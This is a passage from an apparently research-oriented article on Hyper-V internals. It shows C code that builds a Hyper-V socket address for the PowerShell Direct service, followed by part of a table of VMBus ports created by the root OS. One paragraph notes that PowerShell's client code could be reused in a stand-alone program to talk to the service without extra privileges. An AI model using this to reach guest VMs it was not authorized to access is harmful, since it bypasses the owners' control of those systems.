<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR_HV</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> clientService;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSID</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VmID, ServiceID;</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// Initialize GUIDs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//wchar_t* clsid_str = L"{a42e7cda-d03f-480c-9cc2-a4de20abb878}"; // HV_PARENT_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wchar_t</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">* clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{6a964317-1d87-4a74-abf9-46a69b048900}"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &VmID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{999e53d4-3d5c-4c3e-8779-bed06ec056e1}"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//GUID of Powershell Direct Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's compile, we will start application and then receive answer from guest OS:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="63" src="https://lh3.googleusercontent.com/oDUWbY2UN2mME67WUn0LKuKBaySI8gpuhS0Z0BItcff0FlP9rRg02Rdgb_S_fbJctyfGpbmQOCUlkOcTpdml9TnqImxLF5z0PA_lNrzNESFtwYgA2yL2LMeM9wpR6JWEk_n-iiKNawfIkYQi8w" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="177" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We see how icsvc.dll module begins interaction with the client. The protocol of a client part is present in Powershell source codes in the OutOfProcTransportManager.cs and RemoteSessionHyperVSocket.cs therefore technically there are no obstacles to copy this code in the stand-alone program and to use it as full client for communications with PowerShell Direct service without any additional privileges. Certainly, there will be a need to specify registration data under powershell.exe process will be started in guest OS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The table with ports created by root OS for communications with guest OS. Two additional ports are created for PowerShell Direct.</span></div>
<br /><div dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="36"></col><col width="301"></col><col width="81"></col><col width="54"></col><col width="120"></col><col width="50"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">№</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Call stack (or calling function)</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Created Ports (r8)</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PortID</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Type</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SINTx</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateParentMessagePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateVidPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusvdev!VmbusVdev::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMessage</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateChildMessagePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateVidPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusvdev!VmbusVdev::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMessage</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateChildEventPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateVidPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusvdev!VmbusVdev::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmdynmem!DynMemDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">d</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10001</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmuidevices!SynthRdpDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">e</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10002</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="6" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmuidevices!SynthMouseDevice::PowerOn</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12</span></div>
